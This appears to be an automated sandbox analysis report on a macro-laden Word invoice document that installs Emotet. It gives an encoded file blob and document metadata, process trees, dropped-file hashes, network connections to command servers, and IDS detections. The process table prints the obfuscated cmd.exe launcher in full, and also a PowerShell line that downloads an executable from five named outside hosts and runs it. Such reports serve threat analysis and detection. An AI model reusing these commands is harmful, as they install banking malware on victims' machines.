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 AFQATwBPAFAARQBOAAAAQAAAC/AEAAAAEjRWeD==
WordDocumentDocSuppDataBinDataName:	editdata.mso
WordDocumentStylesStyleRPrRFontsCs:	Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi:	Tahoma
WordDocumentStylesStyleRPrRFontsAscii:	Tahoma
WordDocumentStylesStyleRsidVal:	005A24B1
WordDocumentStylesStyleLinkVal:	BalloonTextChar
WordDocumentStylesStyleBasedOnVal:	Normal
WordDocumentStylesStyleTblPrTblCellMarRightType:	dxa
WordDocumentStylesStyleTblPrTblCellMarRightW:	108
WordDocumentStylesStyleTblPrTblCellMarBottomType:	dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW:	-
WordDocumentStylesStyleTblPrTblCellMarLeftType:	dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW:	108
WordDocumentStylesStyleTblPrTblCellMarTopType:	dxa
WordDocumentStylesStyleTblPrTblCellMarTopW:	-
WordDocumentStylesStyleTblPrTblIndType:	dxa
WordDocumentStylesStyleTblPrTblIndW:	-
WordDocumentStylesStyleUiNameVal:	Table Normal
WordDocumentStylesStyleRPrLangBidi:	AR-SA
WordDocumentStylesStyleRPrLangFareast:	EN-US
WordDocumentStylesStyleRPrLangVal:	EN-US
WordDocumentStylesStyleRPrSz-csVal:	22
WordDocumentStylesStyleRPrSzVal:	22
WordDocumentStylesStyleRPrFontVal:	Calibri
WordDocumentStylesStylePPrSpacingLine-rule:	auto
WordDocumentStylesStylePPrSpacingLine:	259
WordDocumentStylesStylePPrSpacingAfter:	160
WordDocumentStylesStyleNameVal:	Normal
WordDocumentStylesStyleStyleId:	Normal
WordDocumentStylesStyleDefault:	on
WordDocumentStylesStyleType:	paragraph
WordDocumentStylesLatentStylesLsdExceptionName:	Normal
WordDocumentStylesLatentStylesLatentStyleCount:	375
WordDocumentStylesLatentStylesDefLockedState:	off
WordDocumentStylesVersionOfBuiltInStylenamesVal:	7
WordDocumentFontsFontSigCsb-1:	00000000
WordDocumentFontsFontSigCsb-0:	000001FF
WordDocumentFontsFontSigUsb-3:	00000000
WordDocumentFontsFontSigUsb-2:	00000009
WordDocumentFontsFontSigUsb-1:	C0007841
WordDocumentFontsFontSigUsb-0:	E0002AFF
WordDocumentFontsFontPitchVal:	variable
WordDocumentFontsFontFamilyVal:	Roman
WordDocumentFontsFontCharsetVal:	00
WordDocumentFontsFontPanose-1Val:	02020603050405020304
WordDocumentFontsFontName:	Times New Roman
WordDocumentFontsDefaultFontsCs:	Times New Roman
WordDocumentFontsDefaultFontsH-ansi:	Calibri
WordDocumentFontsDefaultFontsFareast:	Calibri
WordDocumentFontsDefaultFontsAscii:	Calibri
WordDocumentDocumentPropertiesVersion:	16
WordDocumentDocumentPropertiesCharactersWithSpaces:	12
WordDocumentDocumentPropertiesParagraphs:	1
WordDocumentDocumentPropertiesLines:	1
WordDocumentDocumentPropertiesCharacters:	12
WordDocumentDocumentPropertiesWords:	1
WordDocumentDocumentPropertiesPages:	2
WordDocumentDocumentPropertiesLastSaved:	2019:01:20 23:00:00Z
WordDocumentDocumentPropertiesCreated:	2019:01:20 23:00:00Z
WordDocumentDocumentPropertiesTotalTime:	-
WordDocumentDocumentPropertiesRevision:	1
WordDocumentIgnoreSubtreeVal:	http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentOcxPresent:	no
WordDocumentEmbeddedObjPresent:	no
WordDocumentMacrosPresent:	yes

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
3492	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\INV_GHM227626-840.doc"	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	—	explorer.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000
2664	c:\k1461\a9458\w5644\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set vmfr= l;9b1cLB8gCOUsa+I(2tA7Q6zW%,qw)@F50kE.j{DXudeT/Nhy=\m-}o~4xfG3$VPv:'rMpKSin&&for %F in (71,56,30,27,65,13,8,7,17,11,67,57,34,28,5,27,69,27,73,37,73,73,17,12,48,48,21,70,37,67,57,54,58,28,5,27,49,27,46,37,70,65,67,57,54,62,28,5,27,1,1,0,63,74,3,34,3,62,51,68,53,24,58,24,24,68,2,63,1,19,62,58,3,51,75,45,30,54,56,4,39,45,6,20,0,48,45,20,38,26,45,4,11,1,74,45,75,20,2,63,75,22,62,35,9,51,68,49,20,20,71,67,47,47,53,50,30,45,4,75,45,69,44,38,6,56,53,47,29,70,61,12,42,72,7,43,32,49,20,20,71,67,47,47,53,74,53,74,15,4,75,45,69,38,6,56,53,47,53,61,70,72,72,71,14,43,12,6,32,49,20,20,71,67,47,47,39,15,14,71,74,75,60,56,69,53,15,20,74,6,15,38,6,56,53,47,61,56,71,34,10,5,36,74,23,32,49,20,20,71,67,47,47,15,69,20,45,4,69,43,38,6,56,53,47,49,13,8,44,13,64,50,34,44,32,49,20,20,71,67,47,47,69,56,50,20,69,15,75,14,60,45,69,38,6,56,53,47,15,21,1,66,65,49,45,22,45,68,38,73,71,1,74,20,18,68,32,68,31,2,63,75,3,62,35,24,51,68,39,5,58,22,35,68,2,63,44,5,35,58,9,0,51,0,68,3,24,58,68,2,63,25,3,24,34,62,51,68,29,62,9,3,24,68,2,63,6,22,58,24,9,51,63,45,75,66,67,20,45,53,71,16,68,52,68,16,63,44,5,35,58,9,16,68,38,45,59,45,68,2,60,56,69,45,15,6,49,18,63,36,34,35,34,35,0,74,75,0,63,75,22,62,35,9,31,40,20,69,50,40,63,1,19,62,58,3,38,41,56,30,75,1,56,15,44,33,74,1,45,18,63,36,34,35,34,35,28,0,63,6,22,58,24,9,31,2,63,44,5,19,9,51,68,60,19,34,5,19,68,2,17,60,0,18,18,61,45,20,54,17,20,45,53,0,63,6,22,58,24,9,31,38,1,45,75,10,20,49,0,54,10,45,0,58,35,35,35,35,31,0,40,17,75,66,56,36,45,54,17,20,45,53,0,63,6,22,58,24,9,2,63,53,62,35,34,3,51,68,74,62,24,5,62,68,2,4,69,45,15,36,2,55,55,6,15,20,6,49,40,55,55,63,15,9,5,9,19,51,68,39,3,24,62,19,68,2,86)do set TZBz=!TZBz!!vmfr:~%F,1!&&if %F geq 86 echo !TZBz:~-546!\|cmd"	c:\windows\system32\cmd.exe	—	WINWORD.EXE
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
3260	CmD /V:O/C"set vmfr= l;9b1cLB8gCOUsa+I(2tA7Q6zW%,qw)@F50kE.j{DXudeT/Nhy=\m-}o~4xfG3$VPv:'rMpKSin&&for %F in (71,56,30,27,65,13,8,7,17,11,67,57,34,28,5,27,69,27,73,37,73,73,17,12,48,48,21,70,37,67,57,54,58,28,5,27,49,27,46,37,70,65,67,57,54,62,28,5,27,1,1,0,63,74,3,34,3,62,51,68,53,24,58,24,24,68,2,63,1,19,62,58,3,51,75,45,30,54,56,4,39,45,6,20,0,48,45,20,38,26,45,4,11,1,74,45,75,20,2,63,75,22,62,35,9,51,68,49,20,20,71,67,47,47,53,50,30,45,4,75,45,69,44,38,6,56,53,47,29,70,61,12,42,72,7,43,32,49,20,20,71,67,47,47,53,74,53,74,15,4,75,45,69,38,6,56,53,47,53,61,70,72,72,71,14,43,12,6,32,49,20,20,71,67,47,47,39,15,14,71,74,75,60,56,69,53,15,20,74,6,15,38,6,56,53,47,61,56,71,34,10,5,36,74,23,32,49,20,20,71,67,47,47,15,69,20,45,4,69,43,38,6,56,53,47,49,13,8,44,13,64,50,34,44,32,49,20,20,71,67,47,47,69,56,50,20,69,15,75,14,60,45,69,38,6,56,53,47,15,21,1,66,65,49,45,22,45,68,38,73,71,1,74,20,18,68,32,68,31,2,63,75,3,62,35,24,51,68,39,5,58,22,35,68,2,63,44,5,35,58,9,0,51,0,68,3,24,58,68,2,63,25,3,24,34,62,51,68,29,62,9,3,24,68,2,63,6,22,58,24,9,51,63,45,75,66,67,20,45,53,71,16,68,52,68,16,63,44,5,35,58,9,16,68,38,45,59,45,68,2,60,56,69,45,15,6,49,18,63,36,34,35,34,35,0,74,75,0,63,75,22,62,35,9,31,40,20,69,50,40,63,1,19,62,58,3,38,41,56,30,75,1,56,15,44,33,74,1,45,18,63,36,34,35,34,35,28,0,63,6,22,58,24,9,31,2,63,44,5,19,9,51,68,60,19,34,5,19,68,2,17,60,0,18,18,61,45,20,54,17,20,45,53,0,63,6,22,58,24,9,31,38,1,45,75,10,20,49,0,54,10,45,0,58,35,35,35,35,31,0,40,17,75,66,56,36,45,54,17,20,45,53,0,63,6,22,58,24,9,2,63,53,62,35,34,3,51,68,74,62,24,5,62,68,2,4,69,45,15,36,2,55,55,6,15,20,6,49,40,55,55,63,15,9,5,9,19,51,68,39,3,24,62,19,68,2,86)do set TZBz=!TZBz!!vmfr:~%F,1!&&if %F geq 86 echo !TZBz:~-546!\|cmd"	C:\Windows\system32\cmd.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2396	C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $i9593='m6466';$l2349=new-object Net.WebClient;$n7308='http://mywebnerd.com/qMGOXKLu@http://mimiabner.com/mGMKKpsuOc@http://jaspinformatica.com/Gop5g1kiQ@http://artebru.com/hUBdUVy5d@http://roytransfer.com/aAlvPhe7e'.Split('@');$n9306='j1470';$d1048 = '964';$z9653='q3896';$c7468=$env:temp+'\'+$d1048+'.exe';foreach($k5050 in $n7308){try{$l2349.DownloadFile($k5050, $c7468);$d128='f2512';If ((Get-Item $c7468).length -ge 40000) {Invoke-Item $c7468;$m3059='i3613';break;}}catch{}}$a8182='j9632';"	C:\Windows\system32\cmd.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2672	cmd	C:\Windows\system32\cmd.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
3188	powershell $i9593='m6466';$l2349=new-object Net.WebClient;$n7308='http://mywebnerd.com/qMGOXKLu@http://mimiabner.com/mGMKKpsuOc@http://jaspinformatica.com/Gop5g1kiQ@http://artebru.com/hUBdUVy5d@http://roytransfer.com/aAlvPhe7e'.Split('@');$n9306='j1470';$d1048 = '964';$z9653='q3896';$c7468=$env:temp+'\'+$d1048+'.exe';foreach($k5050 in $n7308){try{$l2349.DownloadFile($k5050, $c7468);$d128='f2512';If ((Get-Item $c7468).length -ge 40000) {Invoke-Item $c7468;$m3059='i3613';break;}}catch{}}$a8182='j9632';	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe		cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
2880	"C:\Users\admin\AppData\Local\Temp\964.exe"	C:\Users\admin\AppData\Local\Temp\964.exe	—	powershell.exe
User: admin Company: Microsoft Corp Integrity Level: MEDIUM Description: Canadian M Exit code: 0 Version: 3.0.69
3868	"C:\Users\admin\AppData\Local\Temp\964.exe"	C:\Users\admin\AppData\Local\Temp\964.exe		964.exe
User: admin Company: Microsoft Corp Integrity Level: MEDIUM Description: Canadian M Exit code: 0 Version: 3.0.69
2684	"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"	C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe	—	964.exe
User: admin Company: Microsoft Corp Integrity Level: MEDIUM Description: Canadian M Exit code: 0 Version: 3.0.69
2332	"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"	C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe		wabmetagen.exe
User: admin Company: Microsoft Corp Integrity Level: MEDIUM Description: Canadian M Version: 3.0.69

Add for printing

Total events

1 785

Read events

1 302

Write events

Delete events

Modification events

No data

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
3492	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\CVR8AB2.tmp.cvr		—
		MD5:—	SHA256:—
3492	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\85853976.jpg		—
		MD5:—	SHA256:—
3188	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0BIJ0Z0QBAH5QK6QHA0J.temp		—
		MD5:—	SHA256:—
3188	powershell.exe	C:\Users\admin\AppData\Local\Temp\964.exe		executable
		MD5:8E6CF82771CD499077BBEFB832561C1F	SHA256:FB46DC41A341916008D247A3CA6BF2D853B96CD745C801E3B7F1CA8929829CB0
3868	964.exe	C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe		executable
		MD5:8E6CF82771CD499077BBEFB832561C1F	SHA256:FB46DC41A341916008D247A3CA6BF2D853B96CD745C801E3B7F1CA8929829CB0
3492	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd		tlb
		MD5:2EA76DAA0F7F36361B17EB491AE099D7	SHA256:9F98B95F9FE10CD2F942AB0603D47499FA4A8667E65C72F6F106A0136DFA4432
3188	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms		binary
		MD5:901ECDF767744E6BB59CB023757886E3	SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3188	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF199ee6.TMP		binary
		MD5:901ECDF767744E6BB59CB023757886E3	SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3492	WINWORD.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm		pgc
		MD5:6E28B672E33ED44FA2233E4B0EA4D984	SHA256:ECF9C6BE22E4A542EBECD6F2A9B2ABCD77BA994D3F8910570A44D4737F95D6E1
3492	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\~$V_GHM227626-840.doc		pgc
		MD5:24085F9030711740CDCB4435AC900FFE	SHA256:66A9210A462BA51260A71589CE7E10398817547AE2EC8F134E92A054BAD76C3B

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
2332	wabmetagen.exe	GET	—	200.43.114.10:8080	http://200.43.114.10:8080/	AR	—	—	malicious
3188	powershell.exe	GET	301	154.16.119.127:80	http://mywebnerd.com/qMGOXKLu	IL	html	368 b	malicious
3188	powershell.exe	GET	200	154.16.119.127:80	http://mywebnerd.com/qMGOXKLu/	IL	executable	559 Kb	malicious
2332	wabmetagen.exe	GET	—	201.103.81.129:80	http://201.103.81.129/	MX	—	—	malicious
2332	wabmetagen.exe	GET	200	189.250.100.248:465	http://189.250.100.248:465/	MX	binary	132 b	suspicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
2332	wabmetagen.exe	190.55.123.250:80	—	Telecentro S.A.	AR	malicious
3188	powershell.exe	154.16.119.127:80	mywebnerd.com	—	IL	suspicious
2332	wabmetagen.exe	200.43.114.10:8080	—	Telecom Argentina S.A.	AR	malicious
2332	wabmetagen.exe	189.159.119.242:22	—	Uninet S.A. de C.V.	MX	suspicious
2332	wabmetagen.exe	189.250.100.248:465	—	Uninet S.A. de C.V.	MX	suspicious
2332	wabmetagen.exe	201.103.81.129:80	—	Uninet S.A. de C.V.	MX	malicious

DNS requests

Domain	IP	Reputation
mywebnerd.com	154.16.119.127	malicious
dns.msftncsi.com	131.107.255.255	shared

Threats

PID	Process	Class	Message
3188	powershell.exe	A Network Trojan was detected	SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3188	powershell.exe	A Network Trojan was detected	SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
3188	powershell.exe	Potential Corporate Privacy Violation	ET POLICY PE EXE or DLL Windows file download HTTP
3188	powershell.exe	Potentially Bad Traffic	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3188	powershell.exe	Misc activity	ET INFO EXE - Served Attached HTTP
2332	wabmetagen.exe	A Network Trojan was detected	SC SPYWARE Spyware Emotet Win32
2332	wabmetagen.exe	A Network Trojan was detected	MALWARE [PTsecurity] Feodo HTTP request
2332	wabmetagen.exe	A Network Trojan was detected	SC SPYWARE Spyware Emotet Win32
2332	wabmetagen.exe	A Network Trojan was detected	MALWARE [PTsecurity] Feodo HTTP request
2332	wabmetagen.exe	A Network Trojan was detected	SC SPYWARE Spyware Emotet Win32

2 ETPRO signatures available at the full report

Add for printing

No debug info

General Info

INV_GHM227626-840.doc

146CDE895A85B18514F10BA169FB32FA

28346E57A30B56A58194F4912D9D49A8105889BC

F3C8DC768A6C7FB3FBA4D26563E02131AFFD60FF87E3639CC901508029513B48

3072:78XgQ0SORjb9SAjryK0yonOVRVDflFbwgfDJVNM+VaYxq6Algy5:78QjLkeyKHHlf3bwwc3YxqZ

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Unusual execution from Microsoft Office

Starts CMD.EXE for commands execution

Runs app for hidden code execution

Application was dropped or rewritten from another process

Downloads executable files from the Internet

EMOTET was detected

Connects to CnC server

Changes the autorun value in the registry

SUSPICIOUS

Starts CMD.EXE for commands execution

Executes PowerShell scripts

Application launched itself

Creates files in the user directory

Executable content was dropped or overwritten

Starts itself from another location

Connects to unusual port

INFO

Reads Microsoft Office registry keys

Creates files in the user directory

Dropped object may contain Bitcoin addresses

Malware configuration

Static information

TRiD

EXIF

XMP

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings